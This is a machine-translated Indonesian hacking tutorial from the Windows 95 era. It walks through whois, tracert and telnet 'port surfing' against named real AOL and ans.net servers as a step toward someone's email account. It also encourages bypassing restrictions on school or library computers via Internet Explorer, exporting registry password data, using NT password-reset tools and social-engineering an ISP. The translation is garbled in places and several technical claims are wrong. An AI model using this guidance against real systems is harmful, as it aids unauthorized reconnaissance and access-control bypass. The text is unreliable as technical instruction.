Sekarang Anda memiliki opsi delapan utilitas TCP / IP untuk dimainkan: telnet, arp, ftp, nbtstat, netstat, ping, route,
dan tracert.

Halaman 20
Telnet adalah masalah besar. Anda juga dapat mengakses program telnet langsung dari Windows. Tapi saat meretasmu
mungkin memerlukan utilitas lain yang hanya dapat digunakan dari DOS, jadi saya suka menelepon telnet dari DOS.
Dengan telnet DOS, Anda sebenarnya dapat port surfing hampir juga dari program telnet Unix. Tapi ada
beberapa trik yang perlu Anda pelajari untuk membuat ini bekerja.
Pertama, kami akan mencoba masuk ke komputer aneh di suatu tempat. Ini adalah hal yang menyenangkan untuk ditunjukkan
kepada teman Anda
yang tidak memiliki petunjuk karena dapat menakuti mereka. Jujur, saya baru saja mencoba ini pada tetangga. Dia
sangat khawatir sehingga ketika dia sampai di rumah dia memanggil suami saya dan memintanya untuk mencegah saya
meretasnya
komputer kerja!
Untuk melakukan ini (maksud saya masuk ke komputer aneh, jangan menakuti tetangga Anda) pergi ke DOS prompt
C: \ WINDOWS> dan berikan perintah "telnet." Ini menampilkan layar telnet. Klik Hubungkan, lalu klik
Sistem Jarak Jauh.
Ini menampilkan kotak yang meminta Anda untuk "Nama Host." Ketik "whois.internic.net" ke dalam kotak ini. Di bawahnya itu
meminta "Port" dan memiliki nilai default "telnet." Biarkan "telnet" untuk pemilihan port. Di bawah itu adalah a
kotak untuk "TermType." Saya sarankan memilih VT100 karena, well, hanya karena saya paling menyukainya.
Hal pertama yang dapat Anda lakukan untuk menakuti tetangga Anda dan mengesankan teman Anda adalah "whois." Klik
Sambungkan dan Anda akan segera mendapatkan prompt yang terlihat seperti ini:
[vt100] InterNIC>
Kemudian tanyakan teman atau tetangga Anda alamat emailnya. Kemudian pada prompt InterNIC ini, ketikkan dua yang terakhir
bagian dari alamat email teman Anda. Misalnya, jika alamatnya adalah "luser@aol.com," ketikkan "aol.com."
Sekarang saya memilih AOL untuk pelajaran ini karena sangat sulit untuk diretas. Hampir semua layanan on-line lainnya akan
melakukannya
lebih mudah.
Untuk AOL kami mendapatkan jawabannya:
[vt100] InterNIC> whois aol.com
Menghubungkan ke rs Database. . . . . .
Terhubung ke Database rs
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
Amerika Serikat
Nama Domain: AOL.COM
Kontak Administratif:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703 / 453-4255 (FAX) 703 / 453-4102
Kontak Teknis, Kontak Zona:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Kontrak Penagihan:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001
Rekam terakhir diperbarui pada 13-Mar-97.

Halaman 21
Rekor dibuat pada 22-Juni-95.
Server domain dalam urutan yang tercantum:
DNS-01.AOL.COM
152.163.199.42
DNS-02.AOL.COM
152.163.199.56
DNS-AOL.ANS.NET
198.83.210.28
Tiga baris terakhir ini memberi nama beberapa komputer yang berfungsi untuk America Online (AOL). Jika kita mau
hack AOL, ini adalah tempat yang bagus untuk memulai.
*********************************
Catatan pemula: Kami baru saja mendapat info tentang tiga "server nama domain" untuk AOL. "Aol.com" adalah nama domain
untuk
AOL, dan server domain adalah komputer yang menyimpan informasi yang memberitahu internet bagaimana caranya
untuk mengirim pesan ke komputer AOL dan alamat email.
*********************************
*********************************
Tip jenius jahat: Menggunakan Win 95 Anda dan koneksi Internet, Anda dapat menjalankan permintaan whois dari banyak
lainnya
komputer, juga. Telnet ke port komputer target Anda 43 dan jika memungkinkan Anda menggunakannya, berikan pertanyaan
Anda.
Contoh: telnet ke nic.ddn.mil, port 43. Setelah terhubung ketik "whois DNS-01.AOL.COM," atau nama apa pun
Anda ingin check out. Namun, ini hanya berfungsi pada komputer yang menjalankan layanan whois pada port
43.
Peringatan: tunjukkan trik ini kepada tetangga Anda dan mereka akan sangat ketakutan. Mereka baru saja melihat Anda
mengakses a
Komputer militer AS! Tapi tidak apa-apa, nic.ddn.mil terbuka untuk umum di banyak port-nya. Lihat Web-nya
situs www.nic.ddn.mil dan situs ftpnya juga - mereka adalah lapisan informasi yang baik untuk peretasan.
*********************************
Selanjutnya saya mencoba berselancar port kecil di DNS-01.AOL.COM tetapi tidak dapat menemukan port terbuka. Jadi ini
taruhan yang aman
komputer berada di belakang firewall AOL.
**********************************
Catatan pemula: port surfing artinya mencoba mengakses komputer melalui beberapa port yang berbeda. Port adalah
dengan cara apa pun Anda mendapatkan informasi masuk atau keluar dari komputer. Misalnya, port 23 adalah yang biasa Anda
gunakan
masuk ke akun shell. Port 25 digunakan untuk mengirim email. Port 80 adalah untuk Web. Ada ribuan
port yang ditunjuk, tetapi komputer tertentu mungkin hanya menjalankan tiga atau empat port. Di rumahmu
komputer port Anda termasuk monitor, keyboard, dan modem.
**********************************
Jadi apa yang akan kita lakukan selanjutnya? Kami menutup program telnet dan kembali ke jendela DOS. Pada prompt DOS
kami memberikan perintah "tracert 152.163.199.42." Atau kita bisa memberikan perintah "tracert DNS-01.AOL.COM."
Bagaimanapun kita akan mendapatkan hasil yang sama. Perintah ini akan melacak rute yang diambil pesan, melompat dari
satu komputer ke komputer lain, saat ia bergerak dari komputer saya ke komputer server domain AOL ini. Inilah yang
kita mendapatkan:
C: \ WINDOWS> tracert 152.163.199.42
Menelusuri rute ke dns-01.aol.com [152.163.199.42]
lebih dari maksimum 30 hop:
1 * * * Permintaan habis.
2 150 ms 144 ms 138 ms 204.134.78.201
3 375 ms 299 ms 196 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 271 ms * 201 ms enss365.nm.org [129.121.1.3]
5 229 ms 216 ms 213 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]

Halaman 22
6 223 ms 236 ms 229 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
7 248 ms 269 ms 257 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 178 ms 212 ms 196 ms h14.t80-1.St-Louis.t3.ans.net [140.223.65.14]
9 316 ms * 298 ms h12.t60-0.Reston.t3.ans.net [140.223.61.9]
10 315 ms 333 ms 331 ms 207.25.134.189
11 * * * Permintaan habis.
12 * * * Permintaan habis.
13 207.25.134.189 laporan: Jaringan tujuan tidak dapat dijangkau.
Apa-apaan ini semua? Nomor di sebelah kiri adalah jumlah komputer yang dilacak oleh rute
melalui. Barang "150 ms" adalah berapa lama, dalam seperseribu detik, dibutuhkan untuk mengirim pesan ke dan dari
komputer itu. Karena sebuah pesan dapat memakan waktu yang berbeda setiap kali Anda mengirimnya, tracert kali lipatnya
trip tiga kali. "*" Berarti perjalanan terlalu lama sehingga tracert berkata "lupakan saja." Setelah info waktu
datang nama komputer yang dicapai pesan, pertama dalam bentuk yang mudah diingat oleh manusia,
lalu dalam bentuk - angka - yang lebih disukai komputer.
"Destination net unreachable" mungkin berarti tracert menabrak firewall.
Mari kita coba server domain AOL kedua.
C: \ WINDOWS> tracert 152.163.199.56
Menelusuri rute ke dns-02.aol.com [152.163.199.56]
lebih dari maksimum 30 hop:
1 * * * Permintaan habis.
2 142 ms 140 ms 137 ms 204.134.78.201
3 246 ms 194 ms 241 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 154 ms 185 ms 247 ms enss365.nm.org [129.121.1.3]
5 475 ms 278 ms 325 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.
45]
6 181 ms 187 ms 290 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.22
1]
7 162 ms 217 ms 199 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 210 ms 212 ms 248 ms h14.t80-1.St-Louis.t3.ans.net [140.223.65.14]
9 207 ms * 208 ms h12.t60-0.Reston.t3.ans.net [140.223.61.9]
10 338 ms 518 ms 381 ms 207.25.134.189
11 * * * Permintaan habis.
12 * * * Permintaan habis.
13 207.25.134.189 laporan: Jaringan tujuan tidak dapat dijangkau.
Perhatikan bahwa kedua tracerts berakhir di komputer yang sama bernama h12.t60-0.Reston.t3.ans.net. Karena AOL adalah
Berkantor pusat di Reston, Virginia, ini adalah taruhan yang bagus. Ini adalah komputer yang secara langsung memasukkan
barang-barang ke AOL. Tapi
kami perhatikan bahwa h12.t60-0.Reston.t3.ans.net, h14.t80-1.St-Louis.t3.ans.net, h14.t64-0.Houston.t3.ans.net dan
Albuquerque.t3.ans.net semuanya memiliki nama numerik yang dimulai dengan 140, dan nama yang diakhiri dengan "ans.net."
Begitu
itu adalah tebakan yang baik bahwa mereka semua milik perusahaan yang sama. Juga, bahwa "t3" di setiap nama menyarankan
ini
komputer adalah router pada tulang punggung komunikasi T3 untuk Internet.
Selanjutnya mari kita periksa server domain AOL akhir:
C: \ WINDOWS> tracert 198.83.210.28
Menelusuri rute ke dns-aol.ans.net [198.83.210.28]
lebih dari maksimum 30 hop:
Halaman 23
1 * * * Permintaan habis.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.
45]
6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.22
1]
7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28]
Jejak selesai.
Hei, kita akhirnya sampai pada sesuatu yang kita bisa yakin adalah kotak AOL, dan kelihatannya
seperti itu di luar firewall! Tapi lihat bagaimana tracert mengambil jalur yang berbeda kali ini, melewati Atlanta
bukannya St Louis dan Reston. Tapi kami masih mencari alamat ans.net dengan T3, jadi ini yang terakhir
nameserver menggunakan jaringan yang sama dengan yang lain.
Sekarang apa yang bisa kita lakukan selanjutnya untuk mendapatkan luser@aol.com benar-benar bertanya-tanya apakah Anda
benar-benar dapat membobolnya
rekening? Kami akan melakukan beberapa surfing port pada server nama domain AOL terakhir ini! Tetapi untuk melakukan ini
kita perlu
untuk mengubah pengaturan telnet kami sedikit.
Klik Terminal, lalu Preferensi. Di kotak preferensi Anda perlu memeriksa "Gema lokal." Anda harus melakukannya
ini, atau Anda tidak akan dapat melihat semua yang Anda dapatkan saat berselancar di pelabuhan. Untuk beberapa alasan,
beberapa
pesan-pesan yang dikirimkan komputer jarak jauh kepada Anda tidak akan muncul di layar telnet Win 95 Anda kecuali Anda
pilih opsi gema lokal. Namun, berhati-hatilah, dalam beberapa situasi semua yang Anda ketik akan muncul
dua kali lipat. Misalnya, jika Anda mengetik "halo" layar telnet dapat menunjukkan "heh lelllo o. Ini tidak berarti
Anda salah ketik, itu hanya berarti pengetikan Anda kembali dikumandangkan pada berbagai interval.
Sekarang klik Connect, lalu Remote System. Kemudian masukkan nama server domain AOL terakhir, dns-
aol.ans.net. Di bawahnya, untuk Port pilih Daytime. Ini akan mengirimkan kepada Anda hari dalam seminggu, tanggal dan waktu
hari di zona waktunya.
Aha! Kita sekarang tahu bahwa dns-aol.ans.net terpapar ke dunia, dengan setidaknya satu port terbuka, heh, heh. ini
pasti prospek untuk berselancar di pelabuhan lebih lanjut. Dan sekarang temanmu bertanya-tanya, bagaimana kamu mendapatkan
sesuatu
keluar dari komputer itu?
******************************
Peringatan pemula yang tidak mengerti: Jika semua orang yang membaca telnet ini ke port siang hari dari komputer ini, sysadmin
akan berkata "Whoa, aku sedang diserang oleh peretas !!! Harus ada eksploit jahat untuk siang hari
layanan! Saya akan menutup port pronto ini! "Maka Anda semua akan mengirim email kepada saya mengeluh hacknya tidak
berfungsi.
Tolong, cobalah peretasan ini di komputer yang berbeda dan jangan semua dihancurkan pada AOL.
******************************
Sekarang mari kita periksa komputer Reston itu. Saya memilih Remote Host lagi dan memasukkan nama h12.t60-
0.Reston.t3.ans.net. Saya mencoba beberapa port surfing tanpa hasil. Ini adalah kotak yang dikunci dengan serius! Apa yang
harus dilakukan
kita lakukan selanjutnya?
Jadi pertama-tama kita menghapus fitur "gema lokal", lalu kita telnet kembali ke whois.internic. Kami bertanya tentang ini
pakaian ans.net yang menawarkan tautan ke AOL:
[vt100] InterNIC> whois ans.net

Halaman 24
Menghubungkan ke rs Database. . . . . .
Terhubung ke Database rs
ANS CO + RE Systems, Inc. (ANS-DOM)
100 Clearbrook Road
Elmsford, NY 10523
Nama Domain: ANS.NET
Kontak Administratif:
Hershman, Ittai (IH4) ittai@ANS.NET
(914) 789-5337
Kontak Teknis:
Pusat Operasi Jaringan ANS (ANS-NOC) noc@ans.net
1-800-456-6300
Kontak Zona:
ANS Hostmaster (AH-ORG) hostmaster@ANS.NET
(800)456-6300 faks: (914)789-5310
Rekam terakhir diperbarui pada 03-Jan-97.
Rekor dibuat pada 27-Sep-90.
Server domain dalam urutan yang tercantum:
NS.ANS.NET
192.103.63.100
NIS.ANS.NET
147.225.1.2
Sekarang jika Anda ingin menjadi peretas yang benar-benar jahat, Anda dapat menghubungi nomor 800 itu dan mencoba menjadi
insinyur sosial a
kata sandi dari seseorang yang bekerja untuk jaringan ini. Tetapi itu tidak baik dan tidak ada yang legal
Anda dapat melakukannya dengan kata sandi ans.net. Jadi saya tidak memberi tahu Anda cara merekayasa sosial kata sandi
tersebut.
Bagaimanapun, Anda mendapatkan ide tentang bagaimana Anda bisa meretas mengumpulkan informasi yang mengarah ke
komputer itu
menangani email siapa pun.
Jadi apa lagi yang bisa Anda lakukan dengan koneksi on-line dan Win 95?
Baiklah ... haruskah saya ceritakan tentang killer ping? Ini cara yang baik untuk kehilangan pekerjaan Anda dan berakhir di
penjara. Anda melakukannya dari
Windows DOS prompt Anda. Temukan detail berdarah di GTMHH Vol.2 Nomor 3, yang disimpan di salah satu
arsip kami tercantum di akhir pelajaran ini. Untungnya sebagian besar administrator sistem telah memperbaiki beberapa hal
saat ini sehingga ping pembunuh tidak akan berfungsi. Tapi kalau-kalau ISP atau LAN Anda di tempat kerja atau sekolah tidak
dilindungi,
jangan mengujinya tanpa persetujuan sysadmin Anda!
Lalu ada ping biasa, juga dilakukan dari DOS. Ini seperti tracert, tetapi yang diperlukan hanyalah waktu berapa lama
pesan berpindah dari satu komputer ke komputer lain, tanpa memberi tahu Anda apa pun tentang komputer di antaranya
milik Anda dan yang Anda ping.
Perintah TCP / IP lain yang tersembunyi di DOS termasuk:
· Arp IP tabel terjemahan alamat fisik
· Ftp Protokol transfer file. Yang ini benar-benar lumpuh. Jangan gunakan itu. Dapatkan program Ftp shareware dari salah satu
unduh situs yang tercantum di bawah ini.
· Nbtstat Menampilkan info jaringan saat ini - super untuk digunakan pada ISP Anda sendiri
· Netstat Mirip dengan Nbstat

Halaman 25
· Rute Kontrol tabel router - peretasan router dianggap lebih elit.
Karena ini adalah perintah semi-rahasia, Anda tidak bisa mendapatkan rincian tentang cara menggunakannya dari bantuan DOS
menu. Tetapi ada file bantuan yang disembunyikan untuk perintah ini.
· Untuk arp, nbtstat, ping dan rute, untuk mendapatkan bantuan cukup ketik perintah dan tekan enter.
· Untuk netstat Anda harus memberikan perintah "netstat?" untuk mendapatkan bantuan.
· Telnet memiliki opsi bantuan pada bilah alat.
Saya belum bisa menemukan trik untuk mendapatkan bantuan untuk perintah ftp.
Sekarang anggaplah Anda berada pada titik di mana Anda ingin melakukan peretasan serius yang memerlukan perintah selain
ini baru saja kita bahas, tetapi Anda tidak ingin menggunakan Unix. Tidak tahu malu! Tapi, sial, meskipun saya biasanya
punya satu atau dua akun shell Unix plus Walnut Creek Slackware di komputer rumah saya, saya masih suka meretas
dari Windows. Ini karena aku kasar. Jadi Anda bisa menjadi kasar juga.
Jadi, apa pilihan Anda berikutnya untuk melakukan peretasan serius dari Windows?
Bagaimana Anda ingin memecahkan kata sandi server Win NT? Unduh program Win 95 gratis NTLocksmith,
program tambahan untuk NTRecover yang memungkinkan untuk mengubah kata sandi pada sistem di mana
kata sandi administratif telah hilang. Itu dianggap bekerja 100% dari waktu. Dapatkan NTLocksmith dan
NTRecover - dan banyak lagi alat peretas gratis - dari http://www.ntinternals.com.
**********************************
Anda bisa masuk ke penjara peringatan: Jika Anda menggunakan NTRecover untuk masuk ke sistem orang lain, Anda hanya
bertanya
untuk ditangkap.
**********************************
Bagaimana Anda ingin menipu teman-teman Anda untuk berpikir bahwa kotak NT mereka telah crash padahal sebenarnya tidak?
Ini
program lelucon dapat diunduh dari http://www.osr.com/insider/insdrcod.htm.
*********************************
Anda bisa mendapatkan pukulan di hidung: perlu saya katakan lebih banyak?
*********************************
Namun sejauh ini alat peretas paling mematikan yang berjalan pada Windows dapat diunduh dari, coba tebak?
http://home.microsoft.com
Program mematikan itu adalah Internet Explorer 3.0. Sayangnya, program ini bahkan lebih baik untuk membiarkan yang lain
peretas masuk ke komputer di rumah Anda dan melakukan hal-hal seperti membuat program perbankan rumah Anda (mis.
Quicken)
transfer tabungan hidup Anda kepada seseorang di Afghanistan.
Tetapi jika Anda tidak cukup berani untuk menjalankan Internet Explorer untuk menjelajahi Web, Anda masih dapat
menggunakannya untuk meretas
komputer sendiri, atau komputer lain di LAN Anda. Soalnya, Internet Explorer benar-benar Windows alternatif
shell yang beroperasi sangat mirip dengan Program Manager dan Windows Explorer yang datang dengan Win 94 dan
Menangkan sistem operasi NT.
Ya, dari Internet Explorer Anda dapat menjalankan program apa pun di komputer Anda sendiri. Atau program apa pun yang
Anda inginkan
memiliki akses di LAN Anda.
***********************************
Catatan pemula: Shell adalah program yang memediasi antara Anda dan sistem operasi. Masalah besar tentang
Internet Explorer menjadi shell Windows adalah bahwa Microsoft tidak pernah memberi tahu siapa pun bahwa itu sebenarnya
shell. Itu

Halaman 26
masalah keamanan yang mengganggu Internet Explorer sebagian besar merupakan konsekuensi dari itu berubah menjadi
kulit. Sebaliknya, browser Web Netscape dan Mosaic bukan shell. Mereka juga jauh lebih aman untuk digunakan.
***********************************
Untuk menggunakan Internet Explorer sebagai shell Windows, angkat seperti yang Anda lakukan jika Anda ingin menjelajahi
Internet Explorer
Web. Matikan upaya program untuk membuat koneksi Internet - kami tidak ingin melakukan hal gila,
apakah kita
Kemudian di ruang di mana Anda biasanya mengetikkan URL yang ingin Anda jelajahi, sebagai gantinya ketik c :.
Wah, lihat semua folder file yang muncul di layar. Terlihat akrab? Ini hal yang sama dengan Anda
Windows Explorer akan menunjukkan kepada Anda. Sekarang untuk bersenang-senang, klik "Program Files" lalu klik
"Accessories" lalu klik
"MSPaint." MSPaint tiba-tiba berjalan. Sekarang lukis teman-teman Anda yang sangat menonton hack ini
terkejut.
Selanjutnya tutup semua hal itu dan kembali ke Internet Explorer. Klik pada folder Windows, lalu klik
Regedit.exe untuk memulainya. Ekspor file kata sandi (ada di HKEY_CLASSES_ROOT). Buka di Word Pad.
Ingat, kemampuan untuk mengendalikan Registry server adalah kunci untuk mengendalikan jaringan yang dilayaninya.
Tunjukkan ini ke tetangga sebelah Anda dan katakan padanya bahwa Anda akan menggunakan Internet Explorer untuk
menjelajahinya
file kata sandi. Dalam beberapa jam, Secret Service akan bertarung dengan FBI di halaman depan Anda tentang siapa
akan mencoba untuk menangkapmu. OK, hanya bercanda di sini.
Jadi bagaimana Anda bisa menggunakan Internet Explorer sebagai alat peretasan? Salah satu caranya adalah jika Anda
menggunakan komputer itu
membatasi kemampuan Anda untuk menjalankan program lain di komputer atau LAN Anda. Lain kali Anda merasa frustrasi
pada
komputer sekolah atau perpustakaan, periksa untuk melihat apakah ia menawarkan Internet Explorer. Jika ya, jalankan dan coba
masukkan disk
nama drive. Sementara C: adalah drive yang umum di komputer di rumah Anda, di LAN Anda mungkin mendapatkan hasilnya
memasukkan R: atau Z: atau huruf alfabet lainnya.
Hack keren berikutnya: coba surfing port otomatis dari Windows! Karena ada ribuan kemungkinan port itu
mungkin terbuka di komputer mana pun, mungkin butuh berhari-hari untuk sepenuhnya menjelajahi bahkan hanya satu komputer
dengan tangan. Baik
jawaban untuk masalah ini adalah surfer port otomatis NetCop, yang dapat ditemukan di http://www.netcop.com/.
Sekarang anggaplah Anda ingin dapat mengakses sistem file NTFS yang digunakan Windows NT dari Win 95 atau
bahkan platform DOS? Ini bisa bermanfaat jika Anda ingin menggunakan Win 95 sebagai platform untuk meretas NT
sistem. http://www.ntinternals.com/ntfsdos.htm menawarkan program yang memungkinkan Win 95 dan DOS mengenali
dan pasang drive NTFS untuk akses transparan.
Hei, kita hampir tidak mulai mengeksplorasi semua alat peretasan Windows yang luar biasa. Itu akan memakan waktu
megabita untuk menulis bahkan satu kalimat tentang masing-masing dan setiap kalimat. Tapi Anda seorang hacker, jadi Anda
akan melakukannya
nikmati menjelajahi lebih dari puluhan program bagus ini sendiri. Berikut ini adalah daftar situs tempat Anda bisa
unduh banyak program gratis dan lebih atau kurang berbahaya yang akan membantu Anda dalam karier peretas Anda:
ftp://ftp.cdrom.com
ftp://ftp.coast.net
http://hertz.njit.edu/%7ebxg3442/temp.html
http://www.alpworld.com/infinity/void-neo.html
http://www.danworld.com/nettools.html
http://www.eskimo.com/~nwps/index.html
http://www.geocities.com/siliconvalley/park/2613/links.html
http://www.ilf.net/Toast/
http://www.islandnet.com/~cliffmcc
http://www.simtel.net/simtel.net
http://www.supernet.net/cwsapps/cwsa.html
http://www.trytel.com/hack/

Halaman 27
http://www.tucows.com
http://www.windows95.com/apps/
http://www2.southwind.net/%7emiker/hack.html
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 3 Bagian 1
Cara Mendapatkan Akun Shell * Bagus *
Dalam Panduan ini Anda akan belajar cara:
· Beri tahu apakah Anda mungkin sudah memiliki akun shell Unix
· Dapatkan akun shell
· Masuk ke akun shell Anda
____________________________________________________________
Anda telah memperbaiki kotak Windows Anda untuk boot dengan logo peretas yang menyeramkan. Anda telah berganti nama
menjadi "Keranjang Sampah"
"Rahasia Haxor Tersembunyi." Saat Anda menjalankan Netscape atau Internet Explorer, alih-alih logo perusahaan yang
membosankan itu,
Anda memiliki Mozilla animasi penuh warna yang menghancurkan Kota New York. Sekarang teman dan tetangga Anda
ketakutan dan terkesan.
Tetapi dalam hati Anda, Anda tahu Windows dihina oleh peretas elit. Anda terus melihat berbulu mereka
mengeksploitasi program dan hampir semuanya membutuhkan sistem operasi Unix. Anda sadar ketika itu
datang untuk mengacaukan jaringan komputer, Unix adalah sistem operasi paling kuat di planet ini. Kamu
telah mengembangkan keinginan yang membara untuk menjadi salah satu dari penyihir Unix itu sendiri. Ya, Anda siap untuk
langkah berikutnya.
Anda siap untuk akun shell. AKUN AKUN !!!!
************************************************ ***
Catatan pemula: Akun shell memungkinkan Anda untuk menggunakan komputer di rumah sebagai terminal yang dapat Anda
berikan
perintah ke komputer yang menjalankan Unix. "Shell" adalah program yang menerjemahkan penekanan tombol Anda ke dalam
Unix
perintah. Dengan akun shell yang tepat Anda dapat menikmati penggunaan workstation yang jauh lebih kuat daripada Anda
pernah bisa bermimpi untuk memiliki diri sendiri. Ini juga merupakan batu loncatan yang bagus untuk hari ketika Anda akan
menjalankan beberapa bentuk Unix di komputer di rumah Anda.
************************************************ ***
Sekali waktu cara yang paling umum untuk mendapatkan di internet adalah melalui akun shell Unix. Tapi
saat ini semua orang dan saudaranya ada di Internet. Hampir semua kawanan peselancar ini menginginkan hanya dua
hal-hal: Web, dan email. Untuk mendapatkan gambar-gambar cantik dari Web saat ini, yang diinginkan konsumen internet rata-
rata
akun koneksi PPP (titik ke titik) belaka. Mereka tidak akan tahu perintah Unix jika itu mengenai mereka di
moncong. Jadi saat ini hampir satu-satunya orang yang menginginkan akun shell adalah kita wannabe peretas.
Masalahnya adalah Anda dulu hanya dapat menelepon ISP, katakan "Saya ingin akun shell," dan mereka
akan memberikannya kepada Anda begitu saja. Tetapi saat ini, terutama jika Anda terdengar seperti pria remaja, Anda akan
bertemu dengannya
sesuatu seperti ini:
Orang ISP: "Anda ingin akun shell? Untuk apa?"
Bung peretas: "Um, well, saya suka Unix."
"Seperti Unix, ya? Kamu seorang hacker, bukan?" Banting, ISP pria menutup telepon Anda.

Halaman 28
Jadi, bagaimana Anda mendapatkan akun shell? Sebenarnya, mungkin saja Anda sudah memilikinya dan belum mengetahuinya.
Begitu
pertama kami akan menjawab pertanyaan, bagaimana Anda tahu apakah Anda sudah memiliki akun shell? Lalu jika
Anda yakin tidak memilikinya, kami akan mengeksplorasi banyak cara untuk mendapatkannya, apa pun yang terjadi
dimanapun di dunia.
Bagaimana Saya Tahu Apakah Saya Sudah Memiliki Akun Shell?
Pertama, Anda perlu menjalankan program yang akan menghubungkan Anda ke akun shell. Ada dua program
dengan Windows 95 yang akan melakukan ini, serta banyak program lain, beberapa di antaranya sangat bagus dan gratis.
Pertama kami akan menunjukkan kepada Anda bagaimana cara menggunakan program Telnet Win 95 karena Anda sudah
memilikinya dan akan selalu ada
kerja. Tetapi ini adalah program yang sangat terbatas, jadi saya sarankan Anda menggunakannya hanya jika Anda tidak bisa
mendapatkan HyperTerminal
program untuk bekerja.
1) Temukan program Telnet Anda dan buat pintasan untuk itu di desktop Anda.
· Salah satu caranya adalah dengan mengklik Mulai, lalu Program, kemudian Windows Explorer.
· Saat Explorer berjalan, ubah ukurannya terlebih dahulu sehingga tidak menutupi seluruh desktop.
· Kemudian klik Alat, lalu Temukan, lalu "File atau Folder."
· Minta untuk mencari "Telnet."
· Ini akan menampilkan file berlabel C: \ windows \ telnet (bukan C: \ mungkin ada drive lain). Klik kanan pada ini
mengajukan.
· Ini akan memunculkan menu yang menyertakan opsi "buat pintasan." Klik "buat pintasan" lalu
seret pintasan ke desktop dan lepaskan.
· Tutup Windows Explorer.
2) Bergantung pada bagaimana sistem Anda dikonfigurasi, ada dua cara untuk terhubung ke Internet. Mudah
caranya adalah dengan melompat ke langkah ketiga. Tetapi jika gagal, kembali ke langkah ini. Mulai program apa pun yang
Anda gunakan untuk mengakses
Internet. Setelah Anda terhubung, minimalkan program. Sekarang coba langkah ketiga.
3) Buka program Telnet Anda dengan mengklik dua kali pada pintasan yang baru saja Anda buat.
· Pertama, Anda perlu mengkonfigurasi Telnet sehingga sebenarnya dapat digunakan. Pada bilah alat klik "terminal," lalu
"preferensi," lalu "font." Pilih "Courier New," "regular" dan 8 point size. Anda melakukan ini karena jika Anda
memiliki font terlalu besar, program Telnet ditampilkan di layar begitu besar sehingga kursor dari shell Anda
Program akhirnya dapat disembunyikan dari layar. OK, OK, Anda dapat memilih font lain, tetapi pastikan itu
ketika Anda menutup kotak dialog bahwa jendela program Telnet sepenuhnya terlihat di layar. Sekarang kenapa
akankah ada opsi yang membuat Telnet tidak mungkin digunakan? Tanya Microsoft.
· Sekarang kembali ke bilah tugas untuk mengklik Connect, lalu di bawahnya klik "Remote system." Ini memunculkan yang lain
kotak dialog.
· Di bawah "nama host" dalam kotak ini ketik dua bagian terakhir dari alamat email Anda. Sebagai contoh, jika email Anda
alamatnya jane_doe@boring.ISP.com, ketikkan "ISP.com" untuk nama host.
· Di bawah "port" di kotak ini, biarkan seperti itu, baca "telnet."
· Di bawah "tipe terminal," di kotak ini, pilih "VT100."
· Kemudian klik tombol Connect dan tunggu untuk melihat apa yang terjadi.
· Jika koneksi gagal, coba masukkan tiga bagian terakhir dari alamat email Anda sebagai tuan rumah, dalam hal ini
"boring.ISP.com."
Sekarang jika Anda memiliki akun shell, Anda selanjutnya harus mendapatkan pesan yang meminta Anda untuk masuk. Itu
mungkin terlihat seperti sesuatu
seperti ini:
Selamat Datang di Layanan Internet Membosankan, Ltd.
Boring.com S9 - login: cmeinel
Kata sandi:
Linux 2.0.0.

Halaman 29
Login terakhir: Kamis 10 April 14:02:00 pada ttyp5 dari pm20.kitty.net.
mengantuk: ~ $
Jika Anda mendapatkan sesuatu seperti ini, Anda pasti beruntung. Yang penting di sini, bagaimanapun, adalah bahwa
komputer menggunakan kata "login" untuk membantu Anda memulai. Jika ditanya hal lain, misalnya "masuk," ini
bukan akun shell.
Segera setelah Anda masuk, dalam kasus Layanan Internet yang Membosankan Anda memiliki prompt Unix shell di layar Anda.
Tapi alih-alih sesuatu yang sederhana ini Anda bisa mendapatkan sesuatu seperti:
BSDI BSD / OS 2.1 (escape.com) (ttyrf)
login: galfina
Kata sandi:
Login terakhir: Kamis 10 April 16:11:37 dari fubar.net
___________________ ______ ______________
___ / ___ / ___ / \ / \ / __ / ___ /
_____ / ___ / \ __ / / __ / / / ___ / ___ /
_______ / / / / / / / / / / /
_________ \ _____ / \ _____ / \ _____ / \ __ / ___ / \ _ / \ _____ / .com
[ESCAPE.COM]
__________________________________________________________________
TOLONG DICATAT:
Beberapa Login dan Dialup Simultan Dari Lokasi Yang Berbeda
_NOT_ Diizinkan di Escape Internet Access.
__________________________________________________________________
Masukkan jenis terminal Anda, KEMBALI untuk vt100,? untuk daftar:
Mengatur jenis terminal ke vt100.
Erase adalah backspace.
UTAMA
Escape Menu Utama
---- [05:45 PM] ----------------------------------------- ------------
==> H) BANTUAN Bantuan & Kiat untuk Escape Interface. (M)
I) INTERNET Akses & Sumber Daya Internet (M)
U) USENETM Konferensi Usenet (Distribusi Internet) (M)
L) LTALK Escape Pusat Komunikasi Lokal (L)
B) BULLETIN Informasi tentang Escape, Peningkatan, acara mendatang. (M)
M) MAIL Escape World Wide dan Local Post Office (M)
F) BERANDA Direktori Rumah Anda (Di mana semua file Anda berakhir)
C) CONFIG Konfigurasikan opsi pengguna dan sistem Anda (M)
S) SHELL Shell (Unix Environment) [TCSH]
X) Sistem Cuti LOGOUT
BACK MAIN HOME MBOX ITALK LOGOUT

Halaman 30
